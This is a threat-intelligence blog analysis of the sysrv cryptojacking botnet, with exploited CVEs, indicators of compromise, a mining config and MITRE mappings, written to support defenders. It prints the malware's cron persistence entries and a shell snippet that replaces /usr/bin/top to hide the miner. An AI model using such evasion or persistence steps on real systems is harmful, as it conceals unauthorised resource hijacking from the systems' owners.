<p><center><img class="alignnone size-full wp-image-6990" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_004a.png" alt="" width="600" srcset="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_004a.png 529w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_004a-300x69.png 300w" sizes="(max-width: 529px) 100vw, 529px" /></center></p>
<h2>Persistence on Host</h2>
<p>The sysrv binary dropped to disk is a statically linked 64bit UPX packed Golang ELF binary. This binary contains an embedded cryptocurrency miner, <a href="https://github.com/xmrig/xmrig" target="_blank" rel="noopener">XMRig</a> which is renamed to “<span class="inlineCodeBlock">[kthreaddi]</span>”. The sysrv binary finds a new writable location to drop itself to disk before adding a cron entry (<a href="https://attack.mitre.org/techniques/T1053/003/" target="_blank" rel="noopener">T1053.003</a>). Through multiple sysrv executions, a different cron entry was created each time during dynamic analysis. Each binary being written to disk is the same file as sysrv, with the exception of the newly created file not being UPX packed. The code blocks below show observed file locations sysrv was written to along with the corresponding cron entry.</p>
<pre class="brush: bash; title: ; notranslate" title="">
* * * * * /home/user/.cache/mozilla/firefox/h2od1b24.default-esr/safebrowsing/6zf2ipl

* * * * * /home/user/.cache/pip/wheels/9d/29/32/q2cszj7oi

* * * * * /home/user/.cache/pip/http/c/0/9/8/a/dpm2fu
</pre>
<p>&nbsp;</p>
<p>Upon executing sysrv, the XMRig binary along with the mining configuration file is written to disk in the current directory of execution. Immediately after the execution of XMRig, the XMRig binary and the configuration file are removed via the <a href="https://man7.org/linux/man-pages/man2/unlinkat.2.html" target="_blank" rel="noopener">unlinkat syscall</a>.</p>
<pre class="brush: bash; title: ; notranslate" title="">
unlinkat(AT_FDCWD, "/home/test/.cache/go-build/2f/.Vvqn9kgF/config.json", 0) = 0
unlinkat(AT_FDCWD, "/home/test/.cache/go-build/2f/.Vvqn9kgF/[kthreaddi]", 0) = 0
</pre>
<h2>Evading Detection on Host</h2>
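<p>The ldr.sh bash script moves <span class="inlineCodeBlock">/usr/bin/top</span> to <span class="inlineCodeBlock">/usr/bin/top_</span> before creating a wrapper script at <span class="inlineCodeBlock">/usr/bin/top</span> that hides the XMRig miner (“<span class="inlineCodeBlock">[kthreaddi]</span>”) from the process list shown by top, filtering it out via a grep command. A <span class="inlineCodeBlock">/usr/bin/top</span> that is a shell script rather than an ELF binary, or the presence of <span class="inlineCodeBlock">/usr/bin/top_</span>, is therefore a host indicator worth checking.</p>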
<pre class="brush: bash; title: ; notranslate" title="">
mv /usr/bin/top /usr/bin/top_
echo '#!/bin/sh
/usr/bin/top_ -p $(ps aux|grep -v "\[kthreaddi\]"|awk "{print \$2}"|grep -v PID|sort -R|head -n20|tr "\n" ","|sed s"/.$//")' &gt; /usr/bin/top
chmod +x /usr/bin/top
</pre>
<h2>Observed Capabilities of Sysrv</h2>
<p>File artifacts observed by the Lacework Labs team indicate the propagator has support for the following exploits:</p>
<p>&nbsp;</p>
<table style="border-collapse: collapse; width: 100%; height: 230px;">
<thead>
<tr style="background-color: #e8e8e8;">
<th style="width: 50%; height: 23px; text-align: center; border-style: solid; border-color: #ffffff;" scope="row"><span style="font-weight: 400; padding-left: 5px;">CVE</span></th>
<th style="width: 50%; text-align: center; height: 23px; border-style: solid; border-color: #ffffff;" scope="row"><span style="font-weight: 400; padding-left: 5px;">Description</span></th>
</tr>
</thead>
<tbody>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE-2017-9841</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">Code injection vulnerability in Drupal component PHPUnit</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE-2019-0193</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">Apache Solr Remote Code Execution Vulnerability</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE-2019-3396</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">Vulnerability in Atlassian Confluence Widget Connector</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE-2021-3129</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">Laravel ignition RCE</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE-2017-11610</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">Vulnerability in XML-RPC server in Supervisor</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE-2017-12149</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">Red Hat JBoss RCE</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE-2019-11581</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">Critical Template Injection Vulnerability in Atlassian Jira<br />
<span style="font-weight: 400; padding-left: 5px;">Server</span></span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE-2019-7238</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">RCE in Sonatype NXRM 3</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE-2017-5638</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">Vulnerability in the Apache Struts MVC framework</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE-2020-14882</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">Oracle WebLogic Server Remote Code Execution</span></td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>
<p>A deeper look into these particular CVEs can be found on a recent Juniper blog post available <a href="https://blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence" target="_blank" rel="noopener">here</a>. The entire execution flow is shown in the diagram below.</p>
<p><center><img loading="lazy" class="alignnone size-full wp-image-6988" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003.png" alt="" width="1997" height="1999" srcset="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003.png 1997w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003-300x300.png 300w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003-1024x1024.png 1024w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003-150x150.png 150w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003-768x769.png 768w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003-1534x1536.png 1534w" sizes="(max-width: 1997px) 100vw, 1997px" /></center>&nbsp;</p>
<h2>Windows Variant</h2>
<p>An alternative to ldr.sh is ldr.ps1 for Windows machines. The observed ldr.ps1 is significantly less robust than its Linux counterpart, focusing largely on killing a handful of other processes prior to downloading and executing sys.exe out of a Windows temp directory. The image below captures the functionality of ldr.ps1.</p>
<p><center><img loading="lazy" class="alignnone size-full wp-image-6991" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_004.png" alt="" width="915" height="182" srcset="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_004.png 915w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_004-300x60.png 300w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_004-768x153.png 768w" sizes="(max-width: 915px) 100vw, 915px" /></center>Executing sys.exe results in the following message being displayed, which translates to “Scanning” in Russian.</p>
<p><center><img loading="lazy" class="alignnone size-full wp-image-6992" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_005.png" alt="" width="282" height="33" /></center>During the execution of sys.exe, the XMRig application along with the mining configuration file is written to a temporary directory created within AppData\Local . Just as with the Linux variant, the Windows variation of the miner is also called “<span class="inlineCodeBlock">[kthreaddi].exe</span>”. The same username that was used in the Linux variant was leveraged within this XMRig configuration file as well. Sys.exe is also written in Golang, and shares similar functionality to the Linux counterpart. As “[kthreaddi].exe&#8221; begins to mine Monero, sys.exe attempts to start infecting other machines.</p>
<p><center><img loading="lazy" class="alignnone size-full wp-image-6993" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_006.png" alt="" width="549" height="50" srcset="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_006.png 549w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_006-300x27.png 300w" sizes="(max-width: 549px) 100vw, 549px" /></center>The following pcap shows the initial c2 request performed during behavioral analysis. In this instance, the server returns the command ‘123654’. While the accepted commands for the malware are unclear, this command preceded both the Monero mining and botnet propagation activities.</p>
<p><center><img loading="lazy" class="alignnone size-full wp-image-6994" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_007.png" alt="" width="1055" height="453" srcset="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_007.png 1055w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_007-300x129.png 300w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_007-1024x440.png 1024w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_007-768x330.png 768w" sizes="(max-width: 1055px) 100vw, 1055px" /></center>&nbsp;</p>
<h2>Total Monero Mined</h2>
<p>During analysis the Lacework Labs team recovered the XMRig configuration file. The configuration was set to mine Monero from f2pool. Looking up the wallet on f2pool’s website shows that, at the time of this writing, the actors leveraging sysrv have mined slightly over 12.1 Monero, worth $3,928.46 USD. The image below shows the XMRig configuration being sent over the network to the mining pool.</p>
<pre class="brush: bash; title: ; notranslate" title="">
{"autosave": false, "watch": false, "background": true, "donate-level": 0, "pools":
   [ { "keepalive": true, "url": "xmr.f2pool.com:13531",
       "user":"49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa.l32",
       "pass": "x" }
    ] }
 }
</pre>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><img loading="lazy" class="alignnone size-full wp-image-6995" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_008.png" alt="" width="1117" height="543" srcset="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_008.png 1117w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_008-300x146.png 300w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_008-1024x498.png 1024w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_008-768x373.png 768w" sizes="(max-width: 1117px) 100vw, 1117px" /></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><img loading="lazy" class="alignnone size-full wp-image-6996" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_009.png" alt="" width="947" height="328" srcset="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_009.png 947w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_009-300x104.png 300w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_009-768x266.png 768w" sizes="(max-width: 947px) 100vw, 947px" /></p>
<p>&nbsp;</p>
<h2>Conclusion</h2>
<p>The actors behind sysrv take advantage of known vulnerabilities to spread their cryptojacking malware. Ensuring public-facing applications (<a href="https://attack.mitre.org/techniques/T1190" target="_blank" rel="noopener">T1190</a>) are kept up to date with the latest security patches is critical to prevent opportunistic adversaries from compromising systems. Due to the lateral movement capabilities of the initial bash (ldr.sh) script, if an infected host is found, it is recommended that other hosts listed in <span class="inlineCodeBlock">authorized_hosts</span>, <span class="inlineCodeBlock">bash_history</span>, and user’s <span class="inlineCodeBlock">~/.ssh/config</span> are inspected for compromise. Because ldr.sh connects to those hosts with SSH keys taken from the infected machine, those keys should also be treated as exposed and rotated.</p>
<p>All IOCs can be found on the Lacework Labs GitHub. Also, please follow <a href="https://twitter.com/laceworklabs" target="_blank" rel="noopener">@LaceworkLabs Twitter</a> to keep up with our latest research.</p>
<h2>IoCs</h2>
<p>&nbsp;</p>
<table style="width: 100%; border-collapse: collapse;">
<tbody>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">ldr.sh</td>
<td style="width: 80%; height: 23px;">c07838598435a26f658654db4ce816914e6cfe70056382471362407d6093e1fa</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">ldr.sh</td>
<td style="width: 80%; height: 23px;">ac0d8aceb01077b5ff3de02c6c63971054104bedabf3732ed169646a3f7e10e9</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">ldr.sh</td>
<td style="width: 80%; height: 23px;">6464434e5040b6bab0dd8b55b906dc1d068a21de5684e75e5eb51aa2608ef0ad</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">ldr.ps1</td>
<td style="width: 80%; height: 23px;">28dcdabaab2837b944a260048792ee4141ab0b3061637d7b9097706292c76877</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">sysrv.exe</td>
<td style="width: 80%; height: 23px;">f115f7826b7857be4522b84a17077a49d0ec0835010da31060acf85bab87778c</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">sysrv.exe (UPX packed)</td>
<td style="width: 80%; height: 23px;">80bc76202b75201c740793ea9cd33b31cc262ef01738b053e335ee5d07a5ba96</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">sysrv</td>
<td style="width: 80%; height: 24px;">d50864f13378b333784f7469df98ef2ea438489ccf0649622897a7712a9c18f8</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">sysrv (UPX packed)</td>
<td style="width: 80%; height: 23px;">544d20fc286d0803dee86a9c34b4c348333e320a4e33fd2730079701cb6e108f</td>
</tr>
</tbody>
</table>
<table style="width: 100%; border-collapse: collapse;">
<tbody>
<tr style="height: 23px;">
<td style="background-color: #000000; width: 100%;" colspan="2"></td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">XMRig Username</td>
<td style="width: 80%; height: 23px; font-size: .9em;">49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa</td>
</tr>
</tbody>
</table>
<table style="width: 100%; border-collapse: collapse;">
<tbody>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">Pool Used</td>
<td style="width: 80%; height: 23px;">xmr.f2pool.com</td>
</tr>
</tbody>
</table>
<table style="width: 100%; border-collapse: collapse;">
<tbody>
<tr style="height: 23px;">
<td style="background-color: #000000; width: 100%;" colspan="2"></td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">IPv4</td>
<td style="width: 80%; height: 23px;">194.145.227.21</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">IPv4</td>
<td style="width: 80%; height: 23px;">194.40.243.98</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">IPv4</td>
<td style="width: 80%; height: 23px;">31.42.177.123</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">IPv4</td>
<td style="width: 80%; height: 23px;">31.210.20.181</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">IPv4</td>
<td style="width: 80%; height: 23px;">31.210.20.120</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">IPv4</td>
<td style="width: 80%; height: 23px;">185.239.242.71</td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>
<p>&nbsp;</p>
<h2>MITRE ATT&amp;CK Mappings</h2>
<p>&nbsp;</p>
<table style="border-collapse: collapse; width: 100%; height: 384px;">
<thead>
<tr style="background-color: #e8e8e8;">
<th style="width: 10%; text-align: center; border-style: solid; border-color: #ffffff; height: 24px;">TID</th>
<th style="width: 25%; text-align: center; border-style: solid; border-color: #ffffff; height: 24px;">Technique Name</th>
<th style="width: 65%; text-align: center; border-style: solid; border-color: #ffffff; height: 24px;">Observed Functionality</th>
</tr>
</thead>
<tbody>
<tr style="height: 24px;">
<td style="width: 10%; height: 24px;">T1496</td>
<td style="width: 25%; height: 24px;">Resource Hijacking</td>
<td style="width: 65%; height: 24px;">Cryptojacking</td>
</tr>
<tr style="height: 24px;">
<td style="width: 10%; height: 24px;">T1110</td>
<td style="width: 25%; height: 24px;">Brute Force</td>
<td style="width: 65%; height: 24px;">The sysrv propagation component attempts to brute force MySQL and Tomcat instances.</td>
</tr>
<tr style="height: 24px;">
<td style="width: 10%; height: 24px;">T1190</td>
<td style="width: 25%; height: 24px;">Exploit Public-Facing Application</td>
<td style="width: 65%; height: 24px;">Leveraging CVEs to exploit public facing applications.</td>
</tr>
<tr style="height: 48px;">
<td style="width: 10%; height: 48px;">T1027.002</td>
<td style="width: 25%; height: 48px;">Obfuscated files or information: Software Packing</td>
<td style="width: 65%; height: 48px;">2nd stage payloads were UPX packed.</td>
</tr>
<tr style="height: 24px;">
<td style="width: 10%; height: 24px;">T1132.001</td>
<td style="width: 25%; height: 24px;">Data Encoding: Standard Encoding</td>
<td style="width: 65%; height: 24px;">Base64 was leveraged within ldr.sh scripts</td>
</tr>
<tr style="height: 24px;">
<td style="width: 10%; height: 24px;">T1059.004</td>
<td style="width: 25%; height: 24px;">Command and Scripting Interpreter: Unix Shell</td>
<td style="width: 65%; height: 24px;">Bash scripts were leveraged for spreading their Cryptojacking malware as well as the propagator.</td>
</tr>
<tr style="height: 48px;">
<td style="width: 10%; height: 48px;">T1021.004</td>
<td style="width: 25%; height: 48px;">Lateral Movement &#8211; Remote Services: SSH</td>
<td style="width: 65%; height: 48px;">Bash scripts leveraged ssh keys to move to hosts within bash_history, known host files, and ssh configs.</td>
</tr>
<tr style="height: 48px;">
<td style="width: 10%; height: 48px;">T1562.001</td>
<td style="width: 25%; height: 48px;">Impair Defenses: Disable or Modify Tools</td>
<td style="width: 65%; height: 48px;">Aliyun agent (Alibaba Cloud) is removed. IPTables are flushed and default policy is changed to allow.</td>
</tr>
<tr style="height: 24px;">
<td style="width: 10%; height: 24px;">T1070.004</td>
<td style="width: 25%; height: 24px;">Indicator Removal on Host: File Deletion</td>
<td style="width: 65%; height: 24px;">The sysrv payload deletes the underlying XMRig binary after it is launched in Linux environments.</td>
</tr>
<tr style="height: 48px;">
<td style="width: 10%; height: 48px;">T1140</td>
<td style="width: 25%; height: 48px;">Deobfuscate/Decode Files or Information</td>
<td style="width: 65%; height: 48px;">Both the ELF and Win32 variants of sysrv/sys.exe have embedded files.</td>
</tr>
<tr style="height: 24px;">
<td style="width: 10%; height: 24px;">T1485</td>
<td style="width: 25%; height: 24px;">Data Destruction</td>
<td style="width: 65%; height: 24px;">The ldr.sh bash script has been observed overwriting contents of /etc/ld.so.preload</td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>

		</div>
	</section>
</main>

  
    <!-- Global script includes -->
    <!-- Google Tag Manager (noscript) -->
<noscript>
  <iframe src=" "height="0" width="0" style="display:none;visibility:hidden"></iframe>
</noscript>
<!-- End Google Tag Manager (noscript) -->

<div class="se-pre-con"></div>

<!-- Engagio Script --> 
<script type="text/javascript" charset="utf-8"> 
  var _eiq = _eiq || []; var _engagio_settings = {  accountId: "eb69cca014db5b67b42a2401139ea11db00f5120" }; (function() {  var ei = document.createElement('script'); ei.type = 'text/javascript'; ei.async = true;  ei.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'web-analytics.engagio.com/js/ei.js';  var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ei, s); })();
</script>
<!-- End Engagio Script -->

<!-- Fontawesome -->
<script src="https://kit.fontawesome.com/293e8b564e.js" crossorigin="anonymous"></script>
<!-- End Fontawesome -->    <script src='https://www.lacework.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js?ver=3.0.9b' id='syntaxhighlighter-core-js'></script>
<script src='https://www.lacework.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushBash.js?ver=3.0.9b' id='syntaxhighlighter-brush-bash-js'></script>
<script type='text/javascript'>
	(function(){
		var corecss = document.createElement('link');
		var themecss = document.createElement('link');
		var corecssurl = "https://www.lacework.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css?ver=3.0.9b";
		if ( corecss.setAttribute ) {
				corecss.setAttribute( "rel", "stylesheet" );
				corecss.setAttribute( "type", "text/css" );
				corecss.setAttribute( "href", corecssurl );
		} else {
				corecss.rel = "stylesheet";
				corecss.href = corecssurl;
		}
		document.head.appendChild( corecss );
		var themecssurl = "https://www.lacework.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css?ver=3.0.9b";
		if ( themecss.setAttribute ) {
				themecss.setAttribute( "rel", "stylesheet" );
				themecss.setAttribute( "type", "text/css" );
				themecss.setAttribute( "href", themecssurl );
		} else {
				themecss.rel = "stylesheet";
				themecss.href = themecssurl;
		}
		document.head.appendChild( themecss );
	})();
	SyntaxHighlighter.config.strings.expandSource = '+ expand source';
	SyntaxHighlighter.config.strings.help = '?';
	SyntaxHighlighter.config.strings.alert = 'SyntaxHighlighter\n\n';
	SyntaxHighlighter.config.strings.noBrush = 'Can\'t find brush for: ';
	SyntaxHighlighter.config.strings.brushNotHtmlScript = 'Brush wasn\'t configured for html-script option: ';
	SyntaxHighlighter.defaults['pad-line-numbers'] = false;
	SyntaxHighlighter.defaults['toolbar'] = false;
	SyntaxHighlighter.all();

	// Infinite scroll support
	if ( typeof( jQuery ) !== 'undefined' ) {
		jQuery( function( $ ) {
			$( document.body ).on( 'post-load', function() {
				SyntaxHighlighter.highlight();
			} );
		} );
	}
</script>
<script id='rocket-browser-checker-js-after'>
"use strict";var _createClass=function(){function defineProperties(target,props){for(var i=0;i<props.length;i++){var descriptor=props[i];descriptor.enumerable=descriptor.enumerable||!1,descriptor.configurable=!0,"value"in descriptor&&(descriptor.writable=!0),Object.defineProperty(target,descriptor.key,descriptor)}}return function(Constructor,protoProps,staticProps){return protoProps&&defineProperties(Constructor.prototype,protoProps),staticProps&&defineProperties(Constructor,staticProps),Constructor}}();function _classCallCheck(instance,Constructor){if(!(instance instanceof Constructor))throw new TypeError("Cannot call a class as a function")}var RocketBrowserCompatibilityChecker=function(){function RocketBrowserCompatibilityChecker(options){_classCallCheck(this,RocketBrowserCompatibilityChecker),this.passiveSupported=!1,this._checkPassiveOption(this),this.options=!!this.passiveSupported&&options}return _createClass(RocketBrowserCompatibilityChecker,[{key:"_checkPassiveOption",value:function(self){try{var options={get passive(){return!(self.passiveSupported=!0)}};window.addEventListener("test",null,options),window.removeEventListener("test",null,options)}catch(err){self.passiveSupported=!1}}},{key:"initRequestIdleCallback",value:function(){!1 in window&&(window.requestIdleCallback=function(cb){var start=Date.now();return setTimeout(function(){cb({didTimeout:!1,timeRemaining:function(){return Math.max(0,50-(Date.now()-start))}})},1)}),!1 in window&&(window.cancelIdleCallback=function(id){return clearTimeout(id)})}},{key:"isDataSaverModeOn",value:function(){return"connection"in navigator&&!0===navigator.connection.saveData}},{key:"supportsLinkPrefetch",value:function(){var elem=document.createElement("link");return elem.relList&&elem.relList.supports&&elem.relList.supports("prefetch")&&window.IntersectionObserver&&"isIntersecting"in IntersectionObserverEntry.prototype}},{key:"isSlowConnection",value:function(){return"connection"in navigator&&"effectiveType"in 
navigator.connection&&("2g"===navigator.connection.effectiveType||"slow-2g"===navigator.connection.effectiveType)}}]),RocketBrowserCompatibilityChecker}();
</script>
<script id='rocket-preload-links-js-extra'>
// Settings read by the link-prefetch script that follows. Every value is a string.
var RocketPreloadLinksConfig = {
  // Regex source; a link whose rebuilt URL matches it is never prefetched
  // (feeds, embeds, the wp-json route, /refer/, /go/, /recommend/, /recommends/).
  "excludeUris": "\/(?:.+\/)?feed(?:\/(?:.+\/?)?)?$|\/(?:.+\/)?embed\/|\/(index\\.php\/)?wp\\-json(\/.*|$)|\/refer\/|\/go\/|\/recommend\/|\/recommends\/",
  // When set, a trailing slash is appended to paths that do not look like files.
  "usesTrailingSlash": "1",
  // Links ending in one of these extensions are skipped by the prefetcher.
  "imageExt": "jpg|jpeg|gif|png|tiff|bmp|webp|avif|pdf|doc|docx|xls|xlsx|php",
  // Paths ending in one of these extensions do not get a trailing slash.
  "fileExt": "jpg|jpeg|gif|png|tiff|bmp|webp|avif|pdf|doc|docx|xls|xlsx|php|html|htm",
  // Only links that start with this prefix are considered for prefetching.
  "siteUrl": "https:\/\/www.lacework.com",
  // Delay, in milliseconds, between hovering a link and prefetching it.
  "onHoverDelay": "100",
  // Hover-triggered prefetches stop once the per-second counter exceeds this.
  "rateThrottle": "3"
};
</script>
<script id='rocket-preload-links-js-after'>
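(function () {
  "use strict";

  /**
   * Builds a case-insensitive "ends with .<ext>" pattern from a
   * pipe-separated extension list.
   *
   * Fix: the dot is now escaped. The previous pattern used a bare `.`, which
   * matches any character, so a path such as "/docx" was treated as a file.
   */
  function extensionPattern(extList) {
    return new RegExp("\\.(" + extList + ")$", "i");
  }

  /**
   * Prefetches same-site pages when the visitor hovers, presses or touches
   * a link.
   *
   * @param {Object} browser  Compatibility checker; supplies feature tests
   *                          and the listener options.
   * @param {Object} config   Settings object (RocketPreloadLinksConfig).
   */
  function RocketPreloadLinks(browser, config) {
    this.browser = browser;
    this.config = config;
    this.options = this.browser.options;
    this.prefetched = new Set();
    this.eventTime = null;
    this.threshold = 1111;
    this.numOnHover = 0;
  }

  /**
   * Compiles the filter patterns and attaches the listeners, unless prefetch
   * is unsupported, data-saver mode is on, or the connection is slow.
   */
  RocketPreloadLinks.prototype.init = function () {
    if (
      !this.browser.supportsLinkPrefetch() ||
      this.browser.isDataSaverModeOn() ||
      this.browser.isSlowConnection()
    ) {
      return;
    }
    this.regex = {
      excludeUris: new RegExp(this.config.excludeUris, "i"),
      images: extensionPattern(this.config.imageExt),
      fileExt: extensionPattern(this.config.fileExt)
    };
    this._initListeners(this);
  };

  /**
   * Registers the document-level listeners.
   *
   * Fix: the listeners were registered with `self.listenerOptions`, a
   * property that is never assigned, so the options supplied by the
   * compatibility checker were silently dropped. They now use `self.options`,
   * which the constructor sets from `browser.options`.
   */
  RocketPreloadLinks.prototype._initListeners = function (self) {
    if (this.config.onHoverDelay > -1) {
      document.addEventListener("mouseover", self.listener.bind(self), self.options);
    }
    document.addEventListener("mousedown", self.listener.bind(self), self.options);
    document.addEventListener("touchstart", self.listener.bind(self), self.options);
  };

  /**
   * Event handler: resolves the nearest enclosing <a> and prefetches it
   * immediately (mousedown/touchstart) or after the hover delay (mouseover).
   */
  RocketPreloadLinks.prototype.listener = function (event) {
    var target = event.target;
    // Not every event target has closest(); treat those as "no link".
    var anchor = target && typeof target.closest === "function" ? target.closest("a") : null;
    var link = this._prepareUrl(anchor);
    if (link === null) {
      return;
    }
    switch (event.type) {
      case "mousedown":
      case "touchstart":
        this._addPrefetchLink(link);
        break;
      case "mouseover":
        this._earlyPrefetch(anchor, link, "mouseout");
        break;
    }
  };

  /**
   * Schedules a prefetch after config.onHoverDelay and cancels it if
   * `resetEvent` fires on the anchor first.
   */
  RocketPreloadLinks.prototype._earlyPrefetch = function (anchor, link, resetEvent) {
    var self = this;
    var timer = setTimeout(function () {
      timer = null;
      if (self.numOnHover === 0) {
        // First hover prefetch of a window: reset the counter one second later.
        setTimeout(function () {
          self.numOnHover = 0;
        }, 1000);
      } else if (self.numOnHover > self.config.rateThrottle) {
        // Over the rate limit: drop this prefetch.
        return;
      }
      self.numOnHover++;
      self._addPrefetchLink(link);
    }, this.config.onHoverDelay);

    anchor.addEventListener(resetEvent, function onReset() {
      anchor.removeEventListener(resetEvent, onReset, { passive: true });
      if (timer !== null) {
        clearTimeout(timer);
        timer = null;
      }
    }, { passive: true });
  };

  /**
   * Records the URL as prefetched and appends <link rel="prefetch"> to <head>.
   * Load failures are ignored on purpose: prefetching is best effort.
   */
  RocketPreloadLinks.prototype._addPrefetchLink = function (link) {
    this.prefetched.add(link.href);
    return new Promise(function (resolve, reject) {
      var el = document.createElement("link");
      el.rel = "prefetch";
      el.href = link.href;
      el.onload = resolve;
      el.onerror = reject;
      document.head.appendChild(el);
    }).catch(function () {});
  };

  /**
   * Turns an anchor element into a normalized link record, or returns null
   * when the link must not be prefetched.
   *
   * The prefetched URL is always rebuilt as siteUrl + pathname, so a prefetch
   * never leaves the configured site.
   *
   * Fixes:
   *  - the guard `!1 in e` tested for a property named "false"; it now tests
   *    for "href", the property the rest of the method reads;
   *  - the site test is a string-prefix comparison, so a URL on another host
   *    or port that merely begins with siteUrl used to pass and produce a
   *    request for a nonexistent same-site path. Such URLs are now rejected
   *    unless the text after the prefix starts a path, query or fragment.
   */
  RocketPreloadLinks.prototype._prepareUrl = function (anchor) {
    if (
      anchor === null ||
      typeof anchor !== "object" ||
      !("href" in anchor) ||
      ["http:", "https:"].indexOf(anchor.protocol) === -1
    ) {
      return null;
    }

    var site = this.config.siteUrl;
    var prefix = anchor.href.substring(0, site.length);
    var rest = anchor.href.substring(site.length);
    var siteEndsWithSlash = site.charAt(site.length - 1) === "/";
    if (
      prefix === site &&
      !siteEndsWithSlash &&
      rest !== "" &&
      "/?#".indexOf(rest.charAt(0)) === -1
    ) {
      return null;
    }

    var pathname = this._getPathname(anchor.href, prefix);
    var link = {
      original: anchor.href,
      protocol: anchor.protocol,
      origin: prefix,
      pathname: pathname,
      href: prefix + pathname
    };
    return this._isLinkOk(link) ? link : null;
  };

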